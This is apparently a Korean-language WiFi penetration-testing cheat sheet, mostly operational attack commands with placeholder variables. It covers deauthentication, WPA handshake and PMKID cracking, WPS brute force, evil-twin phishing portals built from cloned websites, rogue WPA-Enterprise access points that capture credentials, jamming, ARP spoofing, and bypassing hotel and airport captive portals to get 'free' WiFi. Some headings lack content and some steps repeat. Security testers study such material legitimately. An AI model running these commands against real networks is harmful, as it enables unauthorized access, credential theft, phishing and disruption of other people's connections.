
WiFi 침투 테스트 가이드
2.1. 캡티브 포털
2.2. 중간자 공격
3.1. 클라이언트 없음
4.1. 4-way 핸드셰이크 크래킹
4.2. PMKID 공격
4.3. AP 없는 공격
5.1. 가짜 액세스 포인트
5.2. 무차별 대입
5.3. 지원되는 EAP 방법
6.1. Krack 공격 및 Frag 공격
6.2. OSINT
6.3. 와이파이 재밍
6.4. 기타 프레임워크
7.1. 라우터 공격
7.2. 스캐너 유형
7.3. 스푸핑
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
모니터 모드 설정
Airodump-ng 실행
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Airodump-ng를 사용하여 네트워크를 나열하고 AP의 MAC 주소($AP_MAC)와 클라이언트 중 하나의 MAC 주소($CLIENT_MAC)를 얻습니다. 캡처를 중지하지 마십시오.
다른 터미널에서 하나의 클라이언트 또는 모든 클라이언트를 인증 해제합니다. Airodump-ng가 이 네트워크로부터 핸드셰이크를 캡처하면 첫 번째 터미널에 이름 또는 ESSID가 나타납니다:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Airodump-ng를 사용하여 네트워크를 나열하고 AP의 MAC 주소($AP_MAC)와 클라이언트 중 하나의 MAC 주소($CLIENT_MAC)를 얻습니다. 캡처를 중지하지 마십시오.
2.a. 사전 공격 실행
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. 또는 무차별 대입 공격 실행
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
문자 집합으로 l (소문자), u (대문자), n (숫자), c (소문자+대문자), m (소문자+대문자+숫자) 또는 a (모든 인쇄 가능 문자)를 사용할 수 있습니다.
HTTrack을 사용하여 웹사이트 클론
Wifiphiser를 설치합니다. HTTrack 결과를 wifiphisher/data/phishing-pages/new_page/html의 새 폴더에 추가하고 설정 파일을 wifiphisher/data/phishing-pages/new_page/config.ini에 추가합니다.
python setup.py install 또는 bin의 바이너리를 사용하여 프로젝트를 다시 컴파일합니다.
다음 명령어는 hostapd를 설치한 후 최신 Kali 릴리스에서 올바르게 작동합니다:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
캡티브 포털을 우회하는 첫 번째 방법은 이미 인증된 사용자의 MAC 주소로 변경하는 것입니다.
macchanger
이 스크립트(Bash) 같은 사용자 정의 스크립트
또한 다음과 같은 스크립트를 사용하여 프로세스를 자동화할 수 있습니다:
두 번째 방법은 DNS 터널을 생성하는 것입니다. 이를 위해서는 접근 가능한 자신의 DNS 서버가 필요합니다. 이 방법을 사용하면 호텔, 공항 등에서 캡티브 포털을 우회하고 '무료' 와이파이를 얻을 수 있습니다.
nslookup example.com
하나의 'A 레코드': dns.$DOMAIN이 $SERVER_IP를 가리킴 (예: dns.domain.com 139.59.172.117)
하나의 'NS 레코드': hack.$DOMAIN이 dns.$DOMAIN을 가리킴 (예: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
여기에서 올바르게 작동하는지 확인
클라이언트에서 실행
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
네트워크에 연결되면 중간자 공격에 취약한지 테스트할 수 있습니다.
Ettercap을 사용한 ARP 스푸핑 공격
Wireshark 또는 TCPdump를 사용하여 트래픽 스니핑
PCredz (Linux) 또는 Network Miner (Windows)를 사용하여 트래픽 분석
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
워드리스트는 여기에서 얻을 수 있습니다.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
이 스크립트를 사용하거나 다음 단계를 따르십시오:
Hcxdumptool과 Hcxtool을 설치합니다 (이 스크립트를 사용할 수 있습니다).
네트워크 매니저 중지
airmon-ng check kill
3a. 특정 MAC 주소를 공격하려면
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
각 줄의 구조는: PMKID * 라우터 MAC * 스테이션 * ESSID입니다 (https://www.rapidtables.com/convert/number/hex-to-ascii.html 참조).
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
와이파이 연결이 켜져 있지만 주변에 네트워크가 없는 클라이언트 장치에 접근할 수 있는 경우, 클라이언트 장치가 이전에 해당 네트워크에 연결한 적이 있다면 여전히 그 네트워크를 공격할 수 있습니다.
이를 위해 이 파일과 같은 설정 파일을 사용하여 hostpad로 가짜 액세스 포인트를 생성해야 합니다. 비밀번호는 무엇이든 상관없지만 네트워크 이름은 동일해야 합니다. 가짜 네트워크를 만들면 클라이언트 장치가 연결을 시도하고 이 가이드의 4.1 섹션에서 설명한 대로 4-way 핸드셰이크를 얻을 수 있습니다.
가상 머신을 사용하고 싶지 않다면 다음을 사용하여 모든 것을 설치할 수 있습니다:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
다음을 사용하여 액세스 포인트 시작:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
클라이언트가 연결되면 다음을 사용하여 로그를 읽습니다:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
지원되는 EAP 방법 찾기
이는 위대한 Mathy Vanhoef가 발견한 두 가지 고급 공격입니다:
Krack Attack Scripts - 이 웹사이트에 설명됨
Frag Attack Scripts - 이 웹사이트에 설명됨
가짜 액세스 포인트를 제외한 모든 장치를 인증 해제하는 예:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
리눅스:
윈도우:
네트워크에 연결되면
Nmap/Zenmap - 보안 스캐너, 포트 스캐너 및 네트워크 탐색 도구
Masscan - nmap의 더 빠른 버전 (문제를 일으킬 수 있으니 주의)
Netdiscover - ARP 스니핑. 네트워크가 매우 잘 분할된 경우 유용
| 운영 체제 | 플랫폼 | 인증 정보 | 크기 | 링크 |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |